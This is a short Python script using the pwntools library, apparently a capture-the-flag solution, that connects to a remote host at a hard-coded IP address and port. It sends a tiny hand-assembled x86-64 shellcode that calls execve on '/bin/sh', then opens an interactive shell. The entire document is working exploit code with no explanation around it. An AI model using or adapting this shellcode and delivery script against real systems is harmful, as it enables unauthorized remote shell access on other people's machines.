# -*- coding: utf-8 -*-
from pwn import *
context.update(arch='amd64', os='linux')

host = '114.177.250.4'
port = 2210
s = remote(host, port)

shellcode = asm("""
mov rdi, [rax]
lea eax, [ebp + 0x3b]
add rdi, 13
syscall
""") + "/bin/sh"

print(disasm(shellcode))
print(len(shellcode))
assert len(shellcode) <= 0x14

s.send(shellcode)

s.interactive()